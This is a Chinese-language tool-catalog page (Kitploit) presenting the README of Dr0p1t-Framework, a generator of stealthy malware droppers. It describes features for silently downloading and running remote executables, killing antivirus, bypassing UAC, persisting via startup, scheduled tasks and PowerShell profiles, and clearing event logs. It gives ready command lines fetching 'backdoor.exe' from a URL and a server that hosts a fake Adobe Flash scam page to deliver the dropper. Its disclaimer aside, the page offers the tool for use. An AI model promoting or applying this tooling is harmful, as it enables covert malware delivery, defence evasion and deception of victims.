Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Dr0p1t-Framework — 一个创建高级隐蔽型dropper的框架,可绕过大多数杀毒软件,并具备多种技巧。 | Kitploit
工具/GitHubGitHub/d4vinci/dr0p1t-framework
权限提升Payload生成持久化机制漏洞利用IDS/IPS规避取证分析钓鱼攻击恶意软件分析命令与控制社会工程学Payload 开发反机器人Archived
1.5k38767年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

一个创建高级隐蔽型dropper的框架,可绕过大多数杀毒软件,并具备多种技巧。

查看仓库

目前未维护(等待下一版本)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

你听说过木马投毒者(trojan dropper)吗? 简而言之,投毒者是一种下载其他恶意软件的恶意软件类型,而 Dr0p1t 让你有机会创建一个隐蔽的投毒者,它能绕过大多数杀毒软件并具备许多技巧(相信我 :D );)

功能

+ 生成的可执行文件特性:

  • 与其他类似方式生成的投毒者相比,可执行文件体积更小。
  • 在目标系统上下载可执行文件并静默执行。
  • 自毁功能,投毒者完成任务后会自动删除自身。
  • 通过使投毒者创建的所有文件以及投毒者自身在删除前清除内容,逃逸磁盘取证。
  • 完成后清除事件日志。

+ 框架特性:

  • 支持 Windows、Linux,现在也支持 OSX(感谢 @sm4sh3r )
  • Dr0p1t-Server 功能(beta),现在可以从浏览器操作 查看如何使用 Dr0p1t-Server
  • Dr0p1t-Server 提供一个诈骗选项(beta)查看如何使用 Dr0p1t-Server

+ 模块:

  • 在运行恶意软件前查找并终止杀毒软件。
  • 能够禁用 UAC。
  • 能够以管理员身份运行恶意软件。
  • 完整伪装,可将文件图标和扩展名伪装成任意内容。
  • 支持 ZIP 文件,可将可执行文件压缩为 zip 后再上传。
  • 在运行可执行文件前,运行你选择的自定义(批处理|PowerShell|VBS)脚本。
  • 运行 PowerShell 脚本时可绕过执行策略。
  • 使用 UPX 压缩生成的投毒者。

+ 持久化模块:

  • 下载可执行文件后添加到启动项。
  • 下载可执行文件后添加到任务计划程序(UAC 不影响)。
  • 将你的文件添加到 PowerShell 用户配置文件,这样每当 PowerShell.exe 运行时,若文件不存在则会下载并运行。

截图

Windows 上

查看更多

Linux 上(Kali Linux)

查看更多

OSX 上

尚未完全测试!需要一些贡献者和测试者 😄

帮助菜单

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

示例

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

先决条件

  • Python 2 或 Python 3。

Python 2 推荐版本为 2.7.x,Python 3 推荐版本为 3.5.x,不要使用 3.6,因为 PyInstaller 尚不支持。

Linux 所需依赖

  • apt
  • 其他依赖将通过 install.sh 文件安装

注意:需要 root 权限

Windows 所需依赖

  • pip
  • windows_requirements.txt 中的模块

安装

这里有所有官方安装和使用 Dr0p1t 的视频列表 播放列表

  • Linux 上
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • Windows 上(下载 ZIP 并解压后)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

注意:Python 2.7 没有 pip,所以需要先通过 get-pip.py 脚本安装(请自行搜索)

已在以下环境测试:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

使用 Dr0p1t-Server

注意:Server 仍处于测试版本,还有许多功能待添加,设计也有待改进(需要设计师贡献 :D )

先决条件

  • 稳定的互联网连接。
  • 端口 5000 未被占用,并且防火墙已配置为不阻止该端口的连接。

安装和运行服务器

在 Linux 和 Windows 上,按照上述步骤安装 Dr0p1t 后,使用 pip 安装 server_requirements.txt 中的模块:

root@kitploit:~
python -m pip install -r server_requirements.txt

现在运行服务器脚本:

root@kitploit:~
python Dr0p1t_Server.py

运行服务器脚本后,它将开始监听所有发往端口 5000 的连接(使用 Flask)。

要在本机使用服务器,请在浏览器中打开 127.0.0.1:5000 或 [你的 IP]:5000。

要在局域网中从其他设备打开,请打开 [你的本地 IP]:5000;对于广域网中的设备,打开 [你的公网 IP]:5000,但请确保已配置路由器将端口 5000 转发给你。

打开服务器页面后,你会看到一个设计简单的网站,要求输入所需数据 查看服务器截图

提交数据后,数据会经过一系列验证,然后生成 exe 文件,并跳转到一个页面告知你诈骗链接。

进入链接后,你会看到一个下载投毒者的诈骗页面,默认显示 Adobe Flash 下载页面。 要替换诈骗页面,请用你自己的内容替换 "Scam.html" 文件,但注意保留变量(不要删除它们)。

服务器截图

查看更多 Windows 截图 查看更多 Linux 截图

不要分发扫描(请不要用 VirusTotal 扫描 :3)

Todo 查看此链接

联系方式

  • Twitter

捐赠

如果这个工具对你有用,欢迎请我喝杯咖啡 :)

Coffee

免责声明

Dr0p1t Framework 不对滥用和非法用途负责。仅用于渗透测试或教育目的!!!

从本框架复制代码或在其他工具中使用是允许的,只要注明来源即可 😄

欢迎提交 Pull Request :D

下载工具